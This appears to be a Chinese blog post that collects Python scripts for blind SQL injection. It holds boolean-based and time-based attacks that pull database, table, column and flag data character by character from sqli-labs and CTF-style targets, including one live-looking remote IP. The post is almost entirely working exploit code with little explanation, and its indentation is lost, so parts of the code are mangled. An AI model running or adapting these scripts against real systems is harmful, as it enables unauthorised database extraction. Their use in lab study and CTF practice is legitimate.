sql注入之盲注脚本

发布于 2022-03-12  89 次阅读


  • 链接:https://pan.baidu.com/s/1Uw51GRmAA3BRyFSTyVh9nA
    提取码:1234
    --来自百度网盘超级会员V3的分享
    import requests
    session = requests.Session()
    url = "http://caichuanqi.cn/lab/sqli-labs-master/Less-8/?id=1'"           #sql布尔二分法,爆库
    def name():
    name = ''
    for i in range(1,50):
    begin = 32
    end = 128
    tmp = (begin + end) // 2
    while begin < end:
    paramsPost = "and/**/ascii(substr(database(),{0},1))>{1}-- -" .format(i,tmp)
    response = session.get(url+paramsPost)
    if 'You are in...........' in response.text:
    begin = tmp + 1
    tmp = (begin + end) // 2
    else:
    end = tmp
    tmp = (begin + end) // 2
    if(tmp==32):
    break;
    name += chr(tmp)
    print(name)def table():
    name = ''
    for i in range(1,50): a                                     #爆表
    begin = 32
    end = 128
    tmp = (begin + end) // 2
    while begin < end:
    paramsPost = "and/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))>{1}-- -" .format(i,tmp)
    response = session.get(url+paramsPost)
    if 'You are in...........' in response.text:
    begin = tmp + 1
    tmp = (begin + end) // 2
    else:
    end = tmp
    tmp = (begin + end) // 2
    if(tmp==32):
    break;
    name += chr(tmp)
    print(name)
    name()
    table()
  • 徐老师的脚本(#post表单页面布尔判断注入)
    import requests
    session = requests.Session()                  #post表单页面布尔判断注入
    def name():
    name = ''
    for j in range(100):
    begin = 32
    end = 128
    tmp = (begin + end) // 2
    while begin < end:
    paramsPost = {"password": "kawhi", "username": "admin\\"}
    paramsPost['password'] = "or/**/Ascii(right((username),%d))>%d#"%(j+1,tmp)
    print(paramsPost)
    response = session.post("http://81.70.89.91:33013/index.php",data=paramsPost)
    if 'success.jpg' in response.text:
    begin = tmp + 1
    tmp = (begin + end) // 2
    else:
    end = tmp
    tmp = (begin + end) // 2
    name += chr(tmp)
    print(name)
    name()
  • 蔡老师的脚本
    import requests
    import time
    import datetime
    url = "http://127.0.0.1/sqlilabs/Less-9/?id=1'"
    #url = "http://127.0.0.1/sqlilabs/Less-4/?id=1"
    def get_dbname():
    dbname = ''
    for i in range(1,9):
    for k in range(32,127):
    payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+".format(i,k)
    #payload = '") and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+'.format(i,k)
    # payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1) --+".format(i,k)
    #if语句里面的sleep(2)为如果注入语句正确浏览器就休眠两秒,也可以和1调换位置(那样就是如果语句错误休眠两秒)
    time1 = datetime.datetime.now()
    #获得提交payload之前的时间
    res = requests.get(url + payload)
    time2 = datetime.datetime.now()
    #获得payload提交后的时间
    difference = (time2 - time1).seconds
    #time,time2时间差,seconds是只查看秒
    if difference > 1:
    dbname += chr(k)
    else:
    continue
    print("数据库名为->"+dbname)
    get_dbname()
    def get_table():
    table1 = ''
    table2 = ''
    table3 = ''
    table4 = ''
    for i in range(5):
    for j in range(6):
    for k in range(32,127):
    payload = "and if(ascii(substr((select table_name from information_schema.tables where table_schema=\'security\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
    time1 = datetime.datetime.now()
    res = requests.get(url + payload)
    time2 = datetime.datetime.now()
    difference = (time2-time1).seconds
    if difference > 1:
    if i == 0:
    table1 += chr(k)
    print("第一个表为->"+table1)
    elif i == 1:
    table2 += chr(k)
    print("第二个表为->"+table2)
    elif i == 3:
    table3 += chr(k)
    print("第三个表为->"+table3)
    elif i == 4:
    table4 += chr(k)
    print("第四个表为->"+table4)
    else:
    break
    get_table()
    def get_column():
    column1 = ''
    column2 = ''
    column3 = ''
    for i in range(3):
    for j in range(1,9):
    for k in range(32,127):
    payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name=\'flag\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
    time1 = datetime.datetime.now()
    res = requests.get(url+payload)
    time2 = datetime.datetime.now()
    difference = (time2-time1).seconds
    if difference > 1:
    if i == 0:
    column1 += chr(k)
    print("字段一为->"+column1)
    if i == 1:
    column2 += chr(k)
    print("字段二为->"+column2)
    if i == 2:
    column3 += chr(k)
    print("字段三为->"+column3)
    else:
    break
    get_column()def get_flag():
    flag = ''
    for i in range(30):
    for k in range(32,127):
    payload = "and if(ascii(substr((select flag from flag),%d,1))=%d,sleep(2),1)--+"%(i,k)
    time1 = datetime.datetime.now()
    res = requests.get(url+payload)
    time2 = datetime.datetime.now()
    difference = (time2-time1).seconds
    if difference > 1:
    flag += chr(k)
    print("flag为->"+flag)
    get_flag()
子夜不哭
最后更新于 2022-03-12